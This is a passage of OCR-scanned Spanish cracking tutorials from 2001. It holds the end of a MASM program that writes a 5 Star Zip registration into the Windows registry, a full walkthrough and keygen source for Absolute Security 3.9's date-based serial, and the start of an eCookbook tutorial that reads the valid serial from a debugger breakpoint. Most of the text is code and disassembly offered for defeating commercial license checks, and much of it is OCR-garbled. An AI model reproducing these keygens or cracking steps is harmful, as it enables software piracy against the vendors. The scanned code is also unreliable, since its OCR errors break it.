parte de los datos pero sólo nos interesan los tres primeros caracteres) 


mov ebp, Offset varios 
mov ecx, Offset disco 
mov eax, dword ptr [ebpl 
and eax, O0ffffffh 


mov [ecx], eax 


Ya tenemos puesta la letra de nuestro disco en el campo disco. La instrucción anterior sirve para poner el último 
carácter de los cuatro que hemos tomado, a cero. 


xor esi, esi 

mov ebx, Offset cadena 

add ebx, 13 

invoke GetVolumeInformationA, Offset disco,Offset 
varios,0104h,Offset numdisc, Offset dff,Offset varios, Offset varios,0104h 
mov eax, Offset numdisc 

mov eax, dword ptr [eax] 


Tenemos el número del disco duro en EAX, ahora lo pasaremos a decimal. 


mov ecx, 10 


otro: 
cmp eax, ecx 
jb yaesta 
xor edx, edx 
idiv ecx 
add dl, 48 
mov byte ptr [ebpl, dl 
inc ebp 
inc esi 
jmp otro 
yaesta: 
add al, 48 
inc esi 


mov byte ptr [ebpl, al 


Tenemos el número pasado a decimal y colocado en el campo varios al que como veis, le sacamos mucho 
partido :-) Lo hemos puesto tal como se iba generando, es decir: en orden inverso. A continuación lo iremos pasando 
a su lugar definitivo, detrás de la parte conocida del campo cadena, también en orden inverso para que quede 


ordenado correctamente. 


mas: 
mov al, byte ptr [ebpl] 
mov byte ptr [ebx1l, al 
inc ebx 
dec ebp 
dec esi 
.1f esi> 0 

Jjmp mas 
.endif 


Ya esta hecho. Ahora después de esta fase previa vamos al lio. 


xor eax, eax 
xXOr ecx, ecx 

xor ebp, ebp 

mov edx, Offset valor2 
mov edi, Offset cadena 
mov esi, Offset abc 


mov ebx, Offset valorl 
invoke l1lstrlen, offset valorl 
.1f eax < 7 
popad 
mov eax, 7177 
ret 
.endif 
xor eax, eax 


Obtenemos la longitud del nombre introducido ya que he observado que, si tiene menos de siete letras, el programa 
no se registra. En este caso, le damos un valor arbitrario a EAX y volvemos a la rama principal del programa. En 
algún sitio debe haber un control de la longitud del nombre, aunque no lo he visto y tampoco he buscado demasiado. 


buclel: 
mov cl, byte ptr [ebx+teax] 
.1f ecx==0 

Jjmp seguir 
.endif 
.1f ecx>96 

.1f ecx<123 

sub ecx, 32 

.endif 
.endif 
mov [ebx+eax], cl 
inc eax 
jmp buclel 


Este bucle toma las letras una a una, si son minúsculas las convierte en mayúsculas y las vuelve a poner donde 
estaban. Si el carácter no es una letra, lo deja como estaba. 


seguir: 

.1f eax<15 
mov eax, 15 

.endif 

push eax 

mov [edx], al 

pop eax 

dec eax 

push ebx 

inc edx 


La primera letra del serial viene dada por la longitud del nombre, si esta es menor de 15, se iguala a esta cifra y se 
coloca al inicio del campo valor2 donde se formará el serial. Esta cifra se debería dividir por 23, pero he tenido 
problemas con los seriales de 24 o 25 letras (como podéis ver, el programa no deja entrar más) y más arriba, en 


invoke GetDlgltemText... he limitado la entrada a 23 letras. 
bucle2: 
mov cl, byte ptr [ebx] 
if ecx== 
mov ebx, Offset valorl 
jmp bucle2 
.endif 
mov [edx+ebp], cl 
dec eax 


inc ebx 


inc ebp 
.1f eax== 

xor ebp, ebp 
dec edx 

pop ebx 

jmp bucle3 
.endif 
jmp bucle2 


Se pasan las letras del nombre al campo valor2 donde se formará el serial. Si el nombre tiene menos de 15 letras 
se continúan poniendo letras a partir de la primera hasta llegar a las quince. 


bucle3: 
mov al, byte ptr [edx+ebpl]l 
and eax, 000000FEFh 
.1f eax== 
jmp reg 
.endif 
mov cl, byte ptr [edi+ebp] 
add eax, ecx 
push edx 
xor edx, edx 
mov ecx, 23 
idiv ecx 
mov cl, byte ptr [esit+edx] 
pop edx 
mov [edx+ebp], cl 
inc ebp 
inc ebx 
jmp bucle3 


Ponemos en AL el código ASCII de cada letra, ponemos a cero el resto del registro EAX y le sumamos el código del 
carácter correspondiente del campo cadena, dividimos la suma por 23 y tomamos la letra del campo abc 
indicada por el resto (desde la "A" que corresponde al 0, a la "Z" que corresponde al 22). ¿Os habéis preguntado por 
qué 23 letras? ¿Y por qué faltan precisamente la "I", la "O" y la "S"? Pues hay una razón para ello. Pensad a ver si se 
os ocurre :-) Bien, sigamos. Se repite el proceso hasta que se acaban las letras. Insisto en que sí algo no está claro, 
me deis un toque. Ya tenemos el serial que hemos de colocar en el registro de Windows. Vamos a ello... 


reg: 

popad 

invoke RegCreateKeyExA, 80000001h,ADDR 
clave, NULL, NULL, NULL, 0FO0O3Fh,NULL, ADDR 
handle,ADDR dev 

.1f eax!=ERROR_SUCCESS 


push eax 
jmp fin 
.endif 


El valor 8000001 corresponde a HKKEY_CURRENT_USER, y el FOO3E, al nivel de seguridad de acceso (hemos 
puesto el mismo que pone el 5Star Zip). Los demás valores ya están vistos, y la instrucción push eax es porque en 


caso de error, como la última instrucción de la subrutina es RegCloseKey, que no nos dará error, esto cambiaría el 
valor de EAX y enmascararía el resultado. 


invoke RegSetValueExA, handle, ADDR subclavel, NULL, REG_SZ,ADDR valorl1,25 
.1f eax!=ERROR_SUCCESS 


push eax 
jmp fin 
.endif 
invoke RegSetValueExA, handle, ADDR subclave2,NULL,REG_SZ,ADDR valor2,25 
.1f eax!=ERROR_SUCCESS 
push eax 
jmp fin 
.endif 
push eax 


Colocamos los valores correspondientes y si todo ha ido bien, la instrucción push eax que hay al final guarda el 
valor de EAX para recuperarlo a continuación (Si no la pusiéramos, la instrucción pop eax que hemos puesto para 
recuperar el valor de EAX en caso de error, machacaría EAX y nos daría un resultado imprevisible). 


fin: invoke RegCloseKey, HKEY_USERS 


pop eax 
ret 


Cerramos el registro abierto y volvemos a la rama principal del programa. 


Operacion endp 
end start 


Supongo que alguien que entienda de programación en assembler podrá opinar que este código es una chapuza, pero 
tiene algo de bueno: funciona ;-) Ahora sólo queda compilar los dos archivos y ya podemos registrar el programa. 


Yo sólo quería hacer un tutorial sencillo que mostrara como hacer un pequeño programa que se encargara de 
introducir datos en el registro sin tener que utilizar un archivo . reg, pero las cosas se han complicado de mala 
manera. Hubiera sido preferible hacer un keygen, el algoritmo es mucho más sencillo. Quizá lo haga de otro 
programa de la misma empresa :-) 


Como siempre, quiero recordaros que debéis pagar por los programas que utilicéis regularmente, ya que de lo 
contrario, podéis acabar en la lista de los más buscados, junto con los tíos de los turbantes y las barbas :-) 


Para terminar, quiero saludar a mis amigos DeK_Oin - esta vez te he puesto el primero ;-) -, Act MagO, y PrfEsOr 
'X. También a Karpoff, KuaTo_ThoR, vLugo y especialmente a Silver Storm, ya que un comentario suyo me dio la 


idea de hacer este tuto y por supuesto a ByTESCRK agradeciéndole su inestimable colaboración. 


Si queréis alguna aclaración sobre mis tutos, mi dirección de e-mail es: caos_reptante O hotmail.com 


Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en Castellano, sobre 


Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Karpoff Spanish Tutor 2001 


PELOGRAnmAS Absolute Security 3.9 

PROTECCION: Un serial distinto para cada día. 

Objetivo: Hacer un Keygen. 

Descripcion: Utilidad para encriptar archivos. 

Dificultad: Aficionado 

DOWNLOAD : http://www .pepsoft.com/absecpro.zip 

Herramientas: Softice,MAsm32. 

CRACKER: CaoS ReptantE FECHA: 18/11/2001 
INTRODUCCION 


Este tutorial sigue al de 5 StarWinzip. En ese programa me encontré con que el serial 
correcto cambiaba de un día para otro y resolví el tema de una manera muy complicada, 
actuando sobre el registro (se trata de aprender ¿no?). Aquí vamos a operar sobre otro 
programa de la misma empresa con una protección casi idéntica y buscaremos la manera de 
hacer un keygen. El interés que pueda tener este tutorial está en el uso de la función 
GetLocalTime y por supuesto en remarcar el hecho de que con obtener un serial para 
registrarnos, es posible que no hayamos terminado nuestro trabajo. 


AL ATAKE 


Procederemos como en otras ocasiones. Con el Softlce cargado, llegamos a la ventana de registro, ponemos 
unos datos chungos, antes de aceptar entramos en el Slce y colocamos nuestro bpx favorito (amemcpy), 


salimos del Slce y pulsamos OK. Salta el SIce porque el programa ha leído el nombre, le damos a FS para que 
lea la clave y después le damos a F12 siete veces para llegar al programa. Aparecemos aquí: 


:0042C1DD 5E pop esi 


Ahora es cuestión de ver cuando el programa lee nuestro nombre para ver que hace con él (instrucción s 0 
1 Ff£ffffff 'nombre' y a continuación bpm o bpr de la dirección o direcciones obtenidas). Ahora 


empieza un largo peregrinaje para llegar a la rutina de generación del serial. Durante este largo camino 
veremos como el nombre va pasando de un sitio a otro, lo que nos obligará a poner más instrucciones bpr 


(como sólo podemos utilizar cuatro instrucciones bpm, ya se nos han acabado). También es conveniente 
repetir la búsqueda con la instrucción s. . . por si alguno de estos movimientos nos ha pasado desapercibido. 
Llegamos a un punto interesante: 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :00406310(C) 


:004062FD 8A02 mov al, byte ptr [edx] 
:004062FF 3C61 cmp al, 61 

:00406301 7206 jb 00406309 

:00406303 3C7A cmp al, 7A 

:00406305 7702 ja 00406309 

:00406307 2C20 sub al, 20 


* Referenced by a (U)nconditional or (C)onditional Jump at Addresses: 
| :00406301(C), :00406305(C) 


:00406309 8806 mov byte ptr [esil, al 
:0040630B 42 inc edx 

:0040630C 46 inc esi 

:0040630D 4B dec ebx 

:0040630E 85DB test ebx, ebx 
:00406310 75EB jne 004062FD 


Como podéis ver, pasa todas las minúsculas a mayúsculas. Los números y otros caracteres, entre ellos la ñ, la 
€ y las letras acentuadas, quedan como estaban. Tened en cuenta que ahora hay que buscar nuestro nombre 
con mayúsculas. Tras otro buen rato de tracear llegamos a: 


:0040393D 8BOE mov ecx, dword ptr [esi] 
:0040393F 8B1F mov ebx, dword ptr [edi] 
:00403941 39D9 cmp ecx, ebx 
:00403943 7558 jne 0040399D 


Aquí el programa compara el nombre con mayúsculas con el nombre tal como lo hemos entrado. Este mismo 
código se utiliza para varias comparaciones, entre ellas la del serial chungo con el correcto. Esto hace que el 
parcheado del programa sea algo problemático :-( Continuamos, y llegamos por fin a la madre del cordero: 


:0048C70C OFB63E movzx edi, byte ptr [esi] 


Pone en EDI la dirección del texto: "CAOS REPTANTECA"”. Si el nombre introducido tuviera quince o más 


caracteres, aparecería completo. Como en este caso no es así, aparecen los trece caracteres del nombre 
introducido, más los dos primeros, que hacen una longitud total de quince caracteres. 


:0048C70F 8B45F8 mov eax, dword ptr [ebp-08] 
:0048C712 0FB64418FF mOvzxX eax, byte ptr [eax+ebx-01] 


Coloca en EAX la dirección de: "ZZMd5elXW6 ImPgRr”. 


:0048C717 6603F8 add di, ax 

:0048C71A B8E4C74800 mov eax, 0048C7E4 

:0048C71F” 0FB64418FF mOvVzxX eax, byte ptr [eax+ebx-01] 
:0048C724 6603F8 add di, ax 


El programa suma los códigos ASCII del primer carácter de los textos anteriores. A continuación coloca en 
EAX la dirección del texto: "110101v3. 9ABSECPRO" (las seis cifras que están al principio corresponden 


al día de la fecha en formato mmddaa), y suma el código de su primer carácter a la suma anterior. 


:0048C727 33C0 xor eax, eax 
:0048C729 8A85FBFBFEFFF mov al, byte ptr [ebp+FFFEFBFB] 
:0048C72F 6603F8 add di, ax 


Pone en AL el código ASCII de la cifra de las decenas correspondientes al día de la fecha y lo suma. 


:0048C732 33C0 xor eax, eax 
:0048C734 8A85FCFBFFFF mov al, byte ptr [ebp+FFFEFFBEC] 
:0048C73A 6603F8 add di, ax 


Pone en AL el código ASCII de la cifra de las unidades correspondientes al día de la fecha y lo suma. 


:0048C73D OFBEC7 movsx eax, di 
:0048C740 B917000000 mov ecx, 00000017 
:0048C745 99 cda 

:0048C746 FT7F9 idiv ecx 


Finalmente coloca la suma total en EAX y la divide por 23 (17h) 


:0048C748 B8FCC74800 mov eax, 0048C7FC 
EAX señala al texto: "ABCDEFGHIKLMNPORTUVWXYZ". 
:0048C74D 8A1410 mov dl, byte ptr [eaxtedx] 


Ya tenemos en DL la primera letra del serial. Corresponde al resto de la división (en EDX) y puede ser desde 
la "A" (0) hasta la "Z" (22). 


Sigue el código pero ya sabemos lo que nos interesa sobre la generación del serial. Este bucle se repite quince 
veces, hasta completar el serial con las letras que forman los textos que hemos visto. Lo único que no varía 


son las cifras del día de la fecha, que siempre son las mismas: O y 1 (os recuerdo que estamos a 1 de 
noviembre). En resumen: 


(Cc) (A) (0) (5) (A) 
43 41 4F 53 pe 41 
(1) (1) (0) (1) (Cc) 
31 Sil 30 31 a 43 
(2) (2) (M) (d) (R) 


5A 5A 4D 64 e 52 


30 30 30 30 da 30 


+ 31 31 31 31 31 

12F 12D 12D 149 da 137 

:17h D D D E Hb D 
resto: 4 2 2 7 a € 
letra: E E Cc H 25 N 


Bueno, pues ya está. Ahora vamos a por el Msam y nos montaremos dos archivos: el de recursos rsrc.rc 
en el que definiremos la ventana del keygen y los elementos que van en ella, y el de código Absolute.asm 
en el que estarán las instrucciones de nuestro programa. Os recomiendo los tutoriales: Como Craquear con 
Ensamblador para Win32 de Mr. Crimson (los podéis encontrar en la Compilación de Tutoriales 2000 4.0 del 
PrfEsOr X). Espero que os sean tan útiles como a mí ;-) 


tfinclude "Amasm32lincludelresource.h" 


define IDD_DIALOG 1000 
define IDC_NOMBRE 1001 
Hdefine IDC_SERIAL 1002 
Hdefine IDC_GEN 1003 
fdefine IDC_INFO 1004 
Hdefine IDC_EXIT 1005 
Hdefine IDC_STATIC -1 


app ICON key.ico 

IDD_DIALOG DIALOG 100,100,147,121 

STYLE WS_CAPTION | DS_CENTER | WS_SYSMENU |WS_MINIMIZEBOX 
CAPTION "Caos ReptantE" 


FONT 10, "MS Sans Serif" 


BEGIN 
GROUPBOX "Programa", IDC_STATIC,8,6,131,20 
LTEXT "Absolute Security PRO 
3.9", IDC_STATIC,12,14,115,8,ES_CENTER 
GROUPBOX "Website", IDC_STATIC,8,28,131,20 
LTEXT "www.pepsoft.com", IDC_STATIC,12,36,115,8,ES_CENTER 
GROUPBOX "Registro", IDC_STATIC,8,50,131,44 
LTEXT "Nombre", IDC_STATIC,18,61,25,8 
EDITTEXT IDC_NOMBRE, 45, 60,80,11,ES_AUTOHSCROLL | ES_CENTER 
LTEXT "Serial", IDC_STATIC,18,78,25,8 
EDITTEXT IDC_SERIAL, 45,77,80,11,ES_CENTER | ES_READONLY 
PUSHBUTTON "Generar", IDC_GEN,8,101,37,14 


PUSHBUTTON "Info", IDC_INFO,55,101,37,14 


PUSHBUTTON 


END 


Lo dicho, ahí está la ventana y los elementos que hay en ella, con sus dimensiones y características. No 
parecen necesarias más explicaciones. Ahora vamos a por el archivo de código. 


.386 


.model flat,stdcall 


option casemap:none 


include 


include 


"Salir", IDC_EXIT,102,101,37,14 


c:imasm32lincludewindows.inc 
include c:imasm32lincludeluser32.inc 
c:imasm32Xincludeladvapi32.inc 


include c:imasm32lincludelkernel32.inc 


includelib c:imasm321libluser32.1lib 


includelib c:imasm3211libladvapi32.lib 
includelib c:imasm3211iblkernel32.lib 


.const 


IDD_DIALOG 
IDC_NOMBRE 
IDC_SERIAL 
IDC_GEN 
IDC_INFO 
IDC_EXIT 


D1gFunc PROTO 


El procedimiento principal y las dos subrutinas que vamos a utilizar. 


.data 


Icono 
Iconimage 
errorl 
error2 
txt1 


txt2 
nomorig 
nombre 
serial 
campo 
fecha 
dia 
cadenal 


db 
db 
db 
db 
db 


db 
db 
db 
db 
db 
db 
db 
db 


EQU 
EQU 
EQU 
EQU 
EQU 
EQU 


1000 
1001 
1002 
1003 
1004 
1005 


: DWORD, : DWORD, :DWORD, : DWORD 
Operacion PROTO 
Subrutina PROTO 


" app " Ñ 0 
" app " A 0 
"¡Error!",0 


"¡Mínimo cinco caracteres!",0 


"El serial que proporciona este programa sólo es válido ", 


"para el día de hoy.",13,10,51 


"¡Date prisa! 


¡Antes de que den las 12!",13,10,13,10,1 


"Saludos de CaoS ReptantE :0)",0 
"Información",0 


"CaoS ReptantE",12 dup 


25 dup (0),0 
15 dup (0),0 


16 dup (0),0 
8 dup (0),0 
0,0,0 


"ZZ2Md5belXW69mMPGRrR",0 


(0),0 


N 


cadena2 db 6 dup (0),"v3.9ABSEC",0O 


abc db "ABCDEFGHIKLMNPORTUVWXYZ",0 
hInstance dd 0 
hIcon da 0 
hWnd da 0 


La variable nomorig debe tener 25 caracteres como la variable nombre, por lo que acabamos de llenarla 
con ceros. En la variable cadena2 dejamos seis espacios al principio, para poder poner la fecha. 


.code 
start: 


invoke GetModuleHandle,NULL 

mov hInstance,eax 

invoke DialogBoxParam,hInstance, IDD_DIALOG, NULL,ADDR DlgFunc, NULL 
invoke ExitProcess,NULL 


D1lgFunc proc hD1g:DWORD, uMsg: DWORD, wParam: DWORD, 1lParam: DWORD 


.1f uMsg==WM_INITDIALOG 
mov eax,hDlg 
mov hWnd, eax 
invoke LoadIcon,hInstance,ADDR Icono 
mov hlIcon,eax 
invoke SendMessage, hDlg, WM_SETICON, 1,hIcon 
invoke SetDlglItemText,hDlg, IDC_NOMBRE,ADDR nomorig 


Condiciones de partida: la ventana, el icono y nuestro nombre. 


.elseif uMsg==WM_CLOSE 
invoke EndDialog,hDlg,NULL 


Si cerramos desde la parte superior derecha, salimos del programa. 


.elseif uMsg==WM_COMMAND 
mov eax,wParam 
mov edx,eax 
shr edx,16 
.1f dx==BN_CLICKED 
.1f ax==IDC_EXIT 
invoke EndDialog,hDl1g,NULL 
.e€lseif ax==IDC_INFO 
invoke MessageBox,hDl1g,ADDR txt1,ADDR txt2,MB_ICONINFORMATION 
.€lseif ax==IDC_GEN 
invoke GetDlglItemText,hDlg,IDC_NOMBRE,ADDR nombre,26 
invoke GetDlglItemText,hDlg,IDC_NOMBRE,ADDR nomorig,26 
invoke Operacion 
.1f eax==1 
invoke MessageBox,hDl1g,ADDR error2,ADDR error1,MB_ICONSTOP 
.else 
invoke SetDlglItemText,hDlg,IDC_SERIAL,ADDR serial 
invoke SetDlglItemText,hDlg, IDC_NOMBRE,ADDR nomorig 
.endif 


ret 
.endif 
.endif 
.endif 


Si le damos a un botón, el programa actúa en consecuencia. Si es el de salir, cierra el programa; si es el de 

info, muestra una pantalla con la información que hemos definido; y si es el de generar, lee el nombre de la 
ventana (he utilizado la misma instrucción dos veces para pasar el nombre a dos campos distintos: el campo 
nombre con el que vamos a trabajar y el campo nomori g que es el que mostrará la ventana del nombre al 


volver de Operacion) y nos manda a Operacion, que es el núcleo del programa. A la vuelta, si no se ha 
producido un error, nos muestra el nombre y el serial correspondiente. 


ret 
Dl1lgFunc endp 
Operacion proc 


pushad 


Guardamos los registros por si acaso... 


xXor eax, eax 
invoke GetLocalTime, Offset campo 


La función GetLocalTime nos devuelve en la variable campo, 16 bytes con la siguiente información: 


A A M M ds ds DD h h m m s s ms ms 


Donde el año está en formato de cuatro cifras, ds es el día de la semana empezando por el domingo (0) y ms 
son milisegundos. 


mov ecx, Offset cadena2 
mov ebx, Offset campo+2 
invoke Subrutina 


Vamos a Subrutina para calcular el mes. 


mov ebx, Offset campo+6 
invoke Subrutina 


Ahora el día. 


mov ax, word ptr [ecx-2] 
mov edx, Offset dia 

mov word ptr [edx], ax 
mov ebx, Offset campo 
invoke Subrutina 


Y finalmente, el año. 


mov ebx, Offset nombre 
invoke lstrlen, offset nombre 


.1f eax<5 
popad 
mov eax, 1 
ret 

.endif 


Si el nombre tiene menos de cinco caracteres, recuperamos los registros, volvemos y mostramos el mensaje 
de error, ya que el programa sólo admite nombres de cinco o más caracteres. 


mov edx, eax 
push ebx 
completar: 

.1f eax<15 
mov cl, byte ptr [ebx] 
mov byte ptr [ebxtedx], cl 
inc eax 
inc ebx 
jmp completar 

.endif 


Si el nombre tiene menos de quince caracteres, lo completamos con las primeras letras, hasta llegar a quince. 


ebx 
eax, 


pop 
xor 
xor 
buclel: 

mov 
CE 


eax 
ecx, ecx 
cl, byte ptr 
ecx== 
jmp seguir 
.endif 
.1f ecx>96 
.1f ecx<123 
sub ecx, 32 
.endif 
.endif 
mov [ebx+eax], 
inc eax 
jmp buclel 


[ebx+eax] 


cl 


Si el nombre contiene letras minúsculas, las pasamos a mayúsculas. Como antes he comentado, esto no vale 
para la ñ, la q, ni las vocales acentuadas. 
Ahora ya tenemos todas las cosas en su sitio, es el momento de sumarlo todo. 


seguir: 


Offset 
Offset 
offset 
offset 
offset 


esi, 
edi, 
edx, 
ebp, 
eax, 


mov 
mov 
mov 
mov 
mov 
bucle2: 

push eax 

mMOVZX eax, 


mov cl, byte ptr 


byte ptr 


cadenal 
cadena2 
dia 

abc 
serial 


[ebx] 
[esi] 


jmp final 
.endif 


Como tanto el serial como cadena1 tienen 15 caracteres, controlando el final de cadena1, sabremos que 
hemos llegado también al final del serial. 


add eax, ecx 

mov cl, byte ptr [edi] 
add eax, ecx 

mov cl, byte ptr [edx] 
add eax, ecx 

mov cl, byte ptr [edx+1] 
add eax, ecx 

push edx 

xor edx, edx 

mov ecx, 23 

idiv ecx 

mov cl, byte ptr [ebpt+edx] 
pop edx 

pop eax 

mov [eax], cl 

inc esi 

inc edi 

inc eax 

inc ebx 

jmp bucle2 


Hemos sumado, hemos dividido, hemos encontrado cada letra y la hemos ido poniendo en su sitio. 


final: 
popad 


Recuperamos los registros, y estamos de vuelta. 


ret 
Operacion endp 
Subrutina proc 


MOVZX €aX, word ptr [ebx] 
push ecx 

mov ecx, 10 

xor edx, edx 

idiv ecx 

add dl, 48 

mov byte ptr [ebx+10], dl 
xor edx, edx 

idiv ecx 

add dl, 48 

mov byte ptr [ebx+11], dl 


Esta parte se encarga de obtener los códigos ASCII de las dos últimas cifras decimales de la parte de la 
variable campo2 que nos interesa (correspondientes al mes, día y año respectivamente) y de colocarlas en un 


lugar de la misma variable, en el que los datos que contiene no nos son de utilidad. 


mov al, byte ptr [ebx+11] 
pop ecx 

mov [ecx], al 

inc ecx 

mov al, byte ptr [ebx+10] 
mov [ecx], al 

inc ecx 


Pasamos los códigos obtenidos al lugar correspondiente de cadena2 y regresamos. 
ret 
Subrutina endp 


end start 


Como siempre, quiero recordaros que debéis pagar por los programas que utilicéis regularmente, así cuando 
llamen a vuestra puerta, podréis abrir con la seguridad de que no vais a encontraros con unos señores vestidos 
con traje gris, mostrando unas brillantes placas y unas caras muyyyyy serias ;-) 


Para terminar, quiero saludar a Act MagO, PrfEsOr X, ByTESCRK, DeK_Oin, Karpoff, KuaTo_ThoR y 
Silver Storm y por supuesto a todos los que habéis llegado hasta aquí. 


Si queréis alguna aclaración sobre mis tutos, mi dirección de e-mail es: caos_reptante Ohotmail.com 


Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en Castellano, sobre 


Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Programa: 


PROTECCION: 


Objetivo: 
Descripcion: 


Dificultad: 
DOWNLOAD : 
Herramientas: 


CRACKER: 


Karpoff Spanish Tutor 


eCookbook v1.0 


Name / Serial 


Hacer un Keygen 


Este es un bonito programa de recetas de comida, puedes crear las tuyas o hacer uso de 
las casi 170 que trae el programa (lastimosamente en inglés), sin embargo, el programa 
está mal protegido. Esperemos que por ser la primera versión mejore en las próximas. 


Facililla. 


http://code6.netfirms.com 


TRW2000, W32dasm, MASM32 


ByTESCRK FECHA: 08/11/2001 


INTRODUCCION 


Después de pasarme algunos días de vacaciones, he vuelto a las andadas ahora con este nuevo 
programa de nombre eCookbook, no pretendía que este fuera el noveno tutorial y sobre todo en base 
a este programa, pero me ha convencido lo tonto de esta protección, si es que así se le puede llamar 
a esto, tan solo imagínalo, tú sales de tu casa y dejas la llave debajo de la alfombra que está en la 
puerta, luego un desconocido llega, se para en la puerta de tu casa y piensa en donde podrías haber 
escondido la llave, luego se le ocurre que podría estar debajo de la alfombra frente a la puerta, algo 
así para con este programa, solo que no necesitamos pensar ni quebrarnos la cabeza para encontrar 
el serial válido, ahh! y por si fuera poco el otro programa ColorPal v1.0 se obtiene de la misma 
manera, la diferencia es que el serial es distinto (lógico no, me refiero a la manera de encontrar el 
serial), bueno ya verán a lo que me refiero. 


AL ATAKE 


Bueno, vamos a empezar abriendo el programa y nos vamos a Help > About ... > Register, ya alli nos 
aparecen dos botones, uno de Ok y otro de Register y arriba el mensaje de que tenemos 30 días para 
registrarnos, hacemos clic en Register y nos aparecen nuestros fieles amigos (Mr. Ingrese Nombre y Mrs. 
License Key :D), ingresamos nuestros nombre y serial malo... 


Full Name = ByTESCRK 
License key = 19770424 


Y nos aparece una ventanita de error que dice... 


Your license key is not correct! 
Please enter your license key exactly as you recieved it. 


Ahora desensamblamos el archivo eCookbook.exe en el W32DASM y a Strings Reference allí buscamos ese 
error, vemos que aparecen varios 


Los que nos interesan son: 


You have not entered your name! 
Your license key is not correct! <- Hacemos doble clic en este 
Your name must be at least 6 characters <- Si entramos un nombre menor a 6 letras da error 


Al hacer doble clic 


:00498BCD E8127CFAFF call 004407E4 

:00498BD2 6A00 push 00000000 

:00498BD4 668B0DD88D4900 mov cx, word ptr [00498DD8] 
:00498BDB B202 mov dl, 02 


* Possible StringData Ref from Code Obj ->"Your license key is correct!" 


| 

:00498BDD B8E48D4900 mov eax, 00498DE4 

:00498BE2 E8A514FAFF call 0043A08C 

:00498BE7 C7864C02000001000000 mov dword ptr [esi+0000024C], 00000001 
:00498BF1 EB43 ¡mp 00498C36 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
|:0049893A(C) <- Vamos a investigar en este salto 


| 

:00498BF3 6A00 push 00000000 

:00498BF5 668B0DD88D4900 mov cx, word ptr [00498DD8] 
:00498BFC B201 mov dl, 01 


* Possible StringData Ref from Code Obj ->"Your license key is not correct!" 


| 

:00498BFE B8308E4900 mov eax, 00498E30 <- Caemos aqui 
:00498C03 E88414FAFF call 0043A08C 

:00498C08 EB2C jmp 00498C36 


Vamos a ir a investigar a 0049893A y nos encontramos con esto... 


:00498924 BA06000000 mov edx, 00000006 

:00498929 E8B2C1F6FF call 00404AEO 

:0049892E 8B9504FEFFFF mov edx, dword ptr [ebp+FFFFFEO4] 
:00498934 58 pop eax 

:00498935 E82AC2F6FF call 00404B64 <= Ponemos un breakpoint aqui 
:0049893A 0F85B3020000 jne 00498BF3 

:00498940 B201 mov dl, 01 

:00498942 A1A0194600 mov eax, dword ptr [00461940] 
:00498947 E85491FCFF call 00461AA0 

:0049894C 8BD8 mov ebx, eax 

:0049894E BA01000080 mov edx, 80000001 

:00498953 8BC3 mov eax, ebx 

:00498955 E8E691FCFF call 00461B40 

:0049895A B101 mov cl, 01 


* Possible StringData Ref from Code Obj ->"1SoftwarelCode6leCookbook" 


| 

:0049895C BA2C8D4900 mov edx, 00498D2C 
:00498961 8BC3 mov eax, ebx 

:00498963 E83C92FCFF call 00461BA4 


:00498968 B9508D4900 mov ecx, 00498D50 
* Possible StringData Ref from Code Obj ->"Registered" 


| 

:0049896D BA5C8D4900 mov edx, 00498D5C 

:00498972 8BC3 mov eax, ebx 

:00498974 E8C793FCFF call 00461D40 

:00498979 8D95FOFDFFFF lea edx, dword ptr [ebp+FFFFFDFO] 


Vamos a abrir nuestro TRW2000 y buscamos el programa clic en Ok y ponemos un punto de ruptura en 
00498935 pues casi siempre los programas comparan el serial o lo generan en una call antes, salimos del 
TRW2000 con ctrl+n y carga el programa, nos vamos a Help > About ... > Register hacemos clic en OK, 
brinca el TRW2000 y que es este código extraño que vemos en EDX será nuestro código de registro, 
apuntémoslo, borremos el breakpoint con BC * y salimos de TRW2000 nuevamente y lo ingresamos, ok, ya 
estuvo programa registrado. Vieron, servido en bandeja de plata. 


Pero dijimos que ibamos a hacer un keygen entonces sigamos... 


Vamos investigar mas arriba y vemos que no hay ningún otro salto, que venga desde afuera, bueno 
buscaremos el principio de la rutina de generación del serial y es precisamente aqui... 


:0049875C 55 push ebp <- Ponemos un breakpoint para romper desde aqui 
:0049875D 8BEC mov ebp, esp 
:0049875F B948000000 mov ecx, 00000048 


:004987B0 ESFF7FFAFF call 004407B4 

:004987B5 8B8524FEFFFF mov eax, dword ptr [ebp+FFFFFE24] 
:004987BB E860C2F6FF call 00404420 

:004987C0 83F806 cmp eax, 00000006 <= Compara que el nombre sea mayor a 6 letras 
:004987C3 0F8C41040000 jl 00498C0A <= Si es menor ¡error! 
:004987C9 8D9520FEFFFF lea edx, dword ptr [ebp+FFFFFE20] 
:004987CF 8B8618030000 mov eax, dword ptr [esi4+-00000318] 
:004987D5 E8SDA7FFAFF call 004407B4 

:004987DA 8B8520FEFFFF mov eax, dword ptr [ebp+FFFFFE20] 
:004987E0 E83BC2F6FF call 00404420 

:004987E5 85CO0 test eax, eax 

:004987E7 7E4F jle 00498838 

:004987E9 8945F8 mov dword ptr [ebp-08], eax 

:004987EC BBO1000000 mov ebx, 00000001 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
|:00498836(C) 


| 

:004987F1 8D951CFEFFFF lea edx, dword ptr [ebp+FFFFFE1C] 

:004987F7 8B8618030000 mov eax, dword ptr [esi+00000318] 

:004987FD E8B27FFAFF call 004407B4 

:00498802 8B851CFEFFFF mov eax, dword ptr [ebp+FFFFFE1C] <= Nuestro nombre 

:00498808 0FB64418FF movzx eax, byte ptr [eax+ebx-01] <= Extrae el primer caracter en HEX 
:0049880D 50 push eax 

:0049880E 8D9518FEFFFF lea edx, dword ptr [ebp+FFFFFE18] 

:00498814 8B8618030000 mov eax, dword ptr [esi4+-00000318] 

:0049881A E8957FFAFF call 004407B4 

:0049881F 8B8518FEFFFF mov eax, dword ptr [ebp+FFFFFE18] <= Nuestro nombre 

:00498825 0FB64418FF movzx eax, byte ptr [eax+ebx-01] <= Extrae el primer caracter en HEX 
:0049882A 5A pop edx <= Recupera el valor en HEX guardado en memoria 

:0049882B OFAFDO ¡mul edx, eax <= Multiplica los valores y el resultado va a EDX 

:0049882E O3FA add edi, edx <= Agrega el valor a EDI 

:00498830 03FB add edi, ebx <= Suma EBX a EDI (EBX tiene valor 1) 

:00498832 43 inc ebx <= Incrementa EBX 

